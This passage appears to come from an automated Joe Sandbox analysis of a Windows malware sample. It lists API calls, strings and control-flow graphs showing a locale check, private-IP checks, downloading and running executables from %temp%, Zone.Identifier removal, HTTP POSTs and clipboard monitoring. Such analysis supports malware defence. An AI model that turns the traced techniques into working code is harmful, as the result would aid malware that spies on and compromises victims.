                                                                                  • Part of subcall function 0040AEF0: gethostbyname.WS2_32(?), ref: 0040AF0D
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040AF7D
                                                                                • connect.WS2_32(000000FF,?,00000010), ref: 0040AF96
                                                                                • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AFC8
                                                                                Strings
                                                                                • www.update.microsoft.com, xrefs: 0040AF67
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                • String ID: www.update.microsoft.com
                                                                                • API String ID: 4063137541-1705189816
                                                                                • Opcode ID: 4ae1ef7093756838ff96254105526815b724e83601429590a4066d3349afa6d4
                                                                                • Instruction ID: 8d2b89a1e3841e6cd000a2b550c173cff20965c169263ef180e6ea1a6d777d84
                                                                                • Opcode Fuzzy Hash: 4ae1ef7093756838ff96254105526815b724e83601429590a4066d3349afa6d4
                                                                                • Instruction Fuzzy Hash: D1213BB0E103099BCB04DFE8D946AEEBBB5AF08300F108169E504F7390E7745A44CBAA
                                                                                APIs
                                                                                • CryptAcquireContextW.ADVAPI32(~@,00000000,00000000,00000001,F0000040,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C343
                                                                                • CryptGenRandom.ADVAPI32(~@,?,00000000,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C359
                                                                                • CryptReleaseContext.ADVAPI32(~@,00000000,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C365
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                • String ID: ~@
                                                                                • API String ID: 1815803762-592544116
                                                                                • Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                                • Instruction ID: 830194fa38359529e853ee3f0456384099f2f8dd9552bb81b1528bc6e0449336
                                                                                • Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                                • Instruction Fuzzy Hash: B3E01275654208BBDB24CFE1EC49FDA776CAB48B00F108154FB09D7190DAB5EA409BA8
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DA0D,00000000), ref: 004013D5
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                • String ID:
                                                                                • API String ID: 3943618503-0
                                                                                • Opcode ID: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                                                                • Instruction ID: 1e7a4891c1a42a5318b19a32161f2d9e989c632f85172a1bcc985bb178a8dbbc
                                                                                • Opcode Fuzzy Hash: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                                                                • Instruction Fuzzy Hash: 18119674A40710AFE3609F749C0AF877AE0AF04B14F50892DF699E62E1E2B49544878A
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,004075E8), ref: 0040EBF3
                                                                                • strcmp.NTDLL ref: 0040EC02
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocalestrcmp
                                                                                • String ID: UKR
                                                                                • API String ID: 3191669094-64918367
                                                                                • Opcode ID: 60baf994038672de7e905354210f4f0cccfe67ebee51479d5c5c355a5e8cecad
                                                                                • Instruction ID: 39a3b49c0f9cc0ba3e3bafda0df6f1f41861fe80aa697247161161d98fc04bc2
                                                                                • Opcode Fuzzy Hash: 60baf994038672de7e905354210f4f0cccfe67ebee51479d5c5c355a5e8cecad
                                                                                • Instruction Fuzzy Hash: 9AE0CD3594830876DA1065A15C02BA6371C5711701F0000B5AF14A21C1E5765119926B

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040EF99
                                                                                • srand.MSVCRT ref: 0040EFA0
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EFC0
                                                                                • strlen.NTDLL ref: 0040EFCA
                                                                                • mbstowcs.NTDLL ref: 0040EFE1
                                                                                • rand.MSVCRT ref: 0040EFE9
                                                                                • rand.MSVCRT ref: 0040EFFD
                                                                                • wsprintfW.USER32 ref: 0040F024
                                                                                • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F03A
                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F069
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F098
                                                                                • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F0CB
                                                                                • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F0FC
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040F10B
                                                                                • wsprintfW.USER32 ref: 0040F124
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040F134
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F13F
                                                                                • Sleep.KERNEL32(000007D0), ref: 0040F160
                                                                                • ExitProcess.KERNEL32 ref: 0040F188
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040F19E
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040F1AB
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040F1B8
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040F1C5
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F1D0
                                                                                • rand.MSVCRT ref: 0040F1E5
                                                                                • Sleep.KERNEL32 ref: 0040F1FC
                                                                                • rand.MSVCRT ref: 0040F202
                                                                                • rand.MSVCRT ref: 0040F216
                                                                                • wsprintfW.USER32 ref: 0040F23D
                                                                                • DeleteUrlCacheEntryW.WININET(?), ref: 0040F24D
                                                                                • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F267
                                                                                • wsprintfW.USER32 ref: 0040F287
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040F297
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F2A2
                                                                                • Sleep.KERNEL32(000007D0), ref: 0040F2C3
                                                                                • ExitProcess.KERNEL32 ref: 0040F2EA
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040F2F9
                                                                                Strings
                                                                                • %temp%, xrefs: 0040EFBB
                                                                                • %s\%d%d.exe, xrefs: 0040F018
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040F035
                                                                                • %s:Zone.Identifier, xrefs: 0040F118
                                                                                • %s\%d%d.exe, xrefs: 0040F231
                                                                                • %s:Zone.Identifier, xrefs: 0040F27B
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                • API String ID: 3526668077-2417596247
                                                                                • Opcode ID: d61462c6eaf3bb37fe7557a11c84e855f2e164ce5b2d085cf383048d0c46b177
                                                                                • Instruction ID: 8d9dde5e83d6f5576f0fa95dcda068e4d807ca32b5c879c9ce831b2193034ea7
                                                                                • Opcode Fuzzy Hash: d61462c6eaf3bb37fe7557a11c84e855f2e164ce5b2d085cf383048d0c46b177
                                                                                • Instruction Fuzzy Hash: 7D91EBB5940318ABE720DB50DC49FEA3379AF88701F0485B9F609A51C1DABD9AC8CF59

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 490 40b350-40b367 call 40b280 493 40b369 490->493 494 40b36e-40b38a call 40aed0 strcmp 490->494 495 40b5f5-40b5f8 493->495 498 40b391-40b3ad call 40aed0 strstr 494->498 499 40b38c 494->499 502 40b3f0-40b40c call 40aed0 strstr 498->502 503 40b3af-40b3cb call 40aed0 strstr 498->503 499->495 510 40b40e-40b42a call 40aed0 strstr 502->510 511 40b44f-40b46b call 40aed0 strstr 502->511 508 40b3eb 503->508 509 40b3cd-40b3e9 call 40aed0 strstr 503->509 508->495 509->502 509->508 520 40b44a 510->520 521 40b42c-40b448 call 40aed0 strstr 510->521 518 40b46d-40b489 call 40aed0 strstr 511->518 519 40b4ae-40b4c4 EnterCriticalSection 511->519 532 40b4a9 518->532 533 40b48b-40b4a7 call 40aed0 strstr 518->533 523 40b4cf-40b4d8 519->523 520->495 521->511 521->520 527 40b509-40b514 call 40b600 523->527 528 40b4da-40b4ea 523->528 539 40b5ea-40b5ef LeaveCriticalSection 527->539 540 40b51a-40b528 527->540 529 40b507 528->529 530 40b4ec-40b505 call 40d950 528->530 529->523 530->527 532->495 533->519 533->532 539->495 542 40b52a 540->542 543 40b52e-40b53f call 40a240 540->543 542->543 543->539 546 40b545-40b562 call 40d950 543->546 549 40b564-40b574 546->549 550 40b5ba-40b5d2 546->550 551 40b580-40b5b8 call 40a660 549->551 552 40b576-40b57e Sleep 549->552 553 40b5d8-40b5e3 call 40b600 550->553 551->553 552->549 553->539 558 40b5e5 call 40b030 553->558 558->539
                                                                                APIs
                                                                                  • Part of subcall function 0040B280: gethostname.WS2_32(?,00000100), ref: 0040B29C
                                                                                  • Part of subcall function 0040B280: gethostbyname.WS2_32(?), ref: 0040B2AE
                                                                                • strcmp.NTDLL ref: 0040B380
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynamegethostnamestrcmp
                                                                                • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                • API String ID: 2906596889-2213908610
                                                                                • Opcode ID: 0f5039163e3a60cdc16b03ecb7c0134fb67bf6b75b9fd7ee3961c739777e0be2
                                                                                • Instruction ID: 1e2a78016ab808788e4a3d10fbde234ca2a84306dd4339bbdfb36d09265cce6e
                                                                                • Opcode Fuzzy Hash: 0f5039163e3a60cdc16b03ecb7c0134fb67bf6b75b9fd7ee3961c739777e0be2
                                                                                • Instruction Fuzzy Hash: C76171B5940305A7DB00AB61EC46BAA3765AB10318F18847AFC05673C2F77DE664C6DF

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 560 401920-401947 GetTickCount WaitForSingleObject 561 401ac9-401acf 560->561 562 40194d-401964 WSAWaitForMultipleEvents 560->562 563 4019f0-401a03 GetTickCount 562->563 564 40196a-401981 WSAEnumNetworkEvents 562->564 565 401a43-401a4c GetTickCount 563->565 566 401a05-401a14 EnterCriticalSection 563->566 564->563 567 401983-401988 564->567 571 401ab5-401ac3 WaitForSingleObject 565->571 572 401a4e-401a5d EnterCriticalSection 565->572 568 401a16-401a1d 566->568 569 401a3a-401a41 LeaveCriticalSection 566->569 567->563 570 40198a-401990 567->570 573 401a35 call 401820 568->573 574 401a1f-401a27 568->574 569->571 570->563 575 401992-4019b1 accept 570->575 571->561 571->562 576 401aa1-401ab1 LeaveCriticalSection GetTickCount 572->576 577 401a5f-401a77 InterlockedExchangeAdd call 40d950 572->577 573->569 574->568 578 401a29-401a30 LeaveCriticalSection 574->578 575->563 580 4019b3-4019c2 call 4022c0 575->580 576->571 584 401a97-401a9f 577->584 585 401a79-401a82 577->585 578->571 580->563 588 4019c4-4019df call 401740 580->588 584->576 584->577 585->584 587 401a84-401a8d call 40aff0 585->587 587->584 588->563 593 4019e1-4019e7 588->593 593->563 594 4019e9-4019eb call 401cf0 593->594 594->563
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040192C
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                • GetTickCount.KERNEL32 ref: 004019F6
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                • GetTickCount.KERNEL32 ref: 00401A43
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                • String ID: PCOI$ilci
                                                                                • API String ID: 3345448188-3762367603
                                                                                • Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                                • Instruction ID: 2c6eba30162642fa916e9f7e0fa03190df933f3dd928bdc23040f585d31ac0f6
                                                                                • Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                                • Instruction Fuzzy Hash: 9E41F671600300ABCB209F74DC8CB9B77A9AF44720F14463DF995A72E1DB78E881CB99

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.NTDLL ref: 0040E9C8
                                                                                • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EA18
                                                                                • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EA2B
                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040EA64
                                                                                • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040EA9A
                                                                                • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040EAC5
                                                                                • HttpSendRequestA.WININET(00000000,00411FA0,000000FF,00009E34), ref: 0040EAEF
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040EB2E
                                                                                • memcpy.NTDLL(00000000,?,00000000), ref: 0040EB80
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBB1
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBBE
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBCB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                • API String ID: 2761394606-2217117414
                                                                                • Opcode ID: 9c5f2d3cdb4df672490472a7b015f26657257ad2340108b2c41028c19e4f182d
                                                                                • Instruction ID: 65d8e98dfcdbd5221f12c344ddab433f9c0af5994e8cd23f0dde2b718a24ef5d
                                                                                • Opcode Fuzzy Hash: 9c5f2d3cdb4df672490472a7b015f26657257ad2340108b2c41028c19e4f182d
                                                                                • Instruction Fuzzy Hash: 91512EB5901228ABDB26CF54CC54FE9B3BCAB48705F1485E9B60DA6280D7B86FC4CF54

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 613 405910-405932 GetWindowLongW 614 405934-40593b 613->614 615 405956-40595d 613->615 616 405941-405945 614->616 617 4059c7-4059d8 IsClipboardFormatAvailable 614->617 618 405986-40598c 615->618 619 40595f 615->619 624 405964-405981 SetClipboardViewer SetWindowLongW 616->624 625 405947-40594b 616->625 622 4059e3-4059ed IsClipboardFormatAvailable 617->622 623 4059da-4059e1 617->623 620 4059a6-4059aa 618->620 621 40598e-4059a4 SetWindowLongW 618->621 626 405b44-405b5d DefWindowProcA 619->626 627 4059c2 620->627 628 4059ac-4059bc SendMessageA 620->628 621->627 630 4059f8-405a02 IsClipboardFormatAvailable 622->630 631 4059ef-4059f6 622->631 629 405a0b-405a0f 623->629 624->626 632 405951 625->632 633 405afd-405b3e RegisterRawInputDevices ChangeClipboardChain 625->633 627->626 628->627 635 405a15-405a1f OpenClipboard 629->635 636 405adf-405ae3 629->636 630->629 634 405a04 630->634 631->629 632->626 633->626 634->629 635->636 639 405a25-405a36 GetClipboardData 635->639 637 405ae5-405af5 SendMessageA 636->637 638 405afb 636->638 637->638 638->626 640 405a38 639->640 641 405a3d-405a4e GlobalLock 639->641 640->626 642 405a50 641->642 643 405a55-405a66 641->643 642->626 644 405a68-405a6c 643->644 645 405a89-405a9c call 405630 643->645 646 405a9e-405aae call 405750 644->646 647 405a6e-405a72 644->647 653 405ab1-405ac5 GlobalUnlock CloseClipboard 645->653 646->653 649 405a74 647->649 650 405a76-405a87 call 405510 647->650 649->653 650->653 653->636 657 405ac7-405adc call 4048a0 call 40a660 653->657 657->636
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                                                                • SetClipboardViewer.USER32(?), ref: 00405968
                                                                                • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                                                                • OpenClipboard.USER32(00000000), ref: 00405A17
                                                                                • GetClipboardData.USER32(00000000), ref: 00405A29
                                                                                • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                                                                • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                                                                • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                • String ID:
                                                                                • API String ID: 3549449529-0
                                                                                • Opcode ID: cb19e17cacb7ad962392a7750cfffe1c2c8f8667cd08c9b5de7b834d1fa684ec
                                                                                • Instruction ID: ab6473899f09a2e4ce72b89913391a8d882f42dafbfb3729ae4d66df8233a766
                                                                                • Opcode Fuzzy Hash: cb19e17cacb7ad962392a7750cfffe1c2c8f8667cd08c9b5de7b834d1fa684ec
                                                                                • Instruction Fuzzy Hash: 6671FC75A00608EFDF14DFA4D988BAFB7B4EB48300F14856AE506B6290D7799A40CF69

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                • String ID: PCOI$ilci
                                                                                • API String ID: 2403999931-3762367603
                                                                                • Opcode ID: fdb9d9f1c1081d3bac4efd2c1ea591fdf2f72c624c4a3d2a847f061e6529de26
                                                                                • Instruction ID: 4aeae16d9e67a94d8ff1aa5cc2109be900ec35187bf01e7539301e61904878f7
                                                                                • Opcode Fuzzy Hash: fdb9d9f1c1081d3bac4efd2c1ea591fdf2f72c624c4a3d2a847f061e6529de26
                                                                                • Instruction Fuzzy Hash: FA319475900705ABC7209F70EC48B97B7A8BF08300F048A3AF559A3691C77AF894CB98

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.NTDLL ref: 00405838
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                                                                • Sleep.KERNEL32(00000001), ref: 00405864
                                                                                • GetTickCount.KERNEL32 ref: 0040586A
                                                                                • GetTickCount.KERNEL32 ref: 00405873
                                                                                • wsprintfW.USER32 ref: 00405886
                                                                                • RegisterClassExW.USER32(00000030), ref: 00405893
                                                                                • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                                                                • TranslateMessage.USER32(?), ref: 004058E5
                                                                                • DispatchMessageA.USER32(?), ref: 004058EF
                                                                                • ExitThread.KERNEL32 ref: 00405901
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                • String ID: %x%X$0
                                                                                • API String ID: 716646876-225668902
                                                                                • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                                • Instruction ID: f3e1014eb48ffaf448ebc99f6ba60d6258e7c56012e586919e9efecad1237f6d
                                                                                • Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                                • Instruction Fuzzy Hash: BB211A71940308BBEB10ABA0DC49FEE7B78EB04711F108439F606BA1D0DBB995948F69

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
